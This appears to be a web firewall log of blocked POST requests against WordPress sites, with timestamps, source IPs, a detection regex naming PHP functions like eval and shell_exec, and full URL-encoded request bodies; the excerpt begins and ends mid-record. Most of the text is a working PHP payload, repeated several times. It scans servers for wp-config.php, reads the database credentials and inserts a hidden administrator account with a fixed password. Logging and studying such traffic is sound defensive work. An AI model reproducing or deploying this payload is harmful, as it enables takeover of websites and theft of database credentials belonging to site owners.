user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php HTTP\/1.1\nsec-fetch-user:?1\nsec-fetch-dest:document\ncontent-length:12640\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:4=36a4c8b62b7aabfcdffca1c8db607abc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvp1tvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvrS9wo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nsec-fetch-mode:navigate\n\nsX=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:09:37","213.209.159.254","POST","\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> jA:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D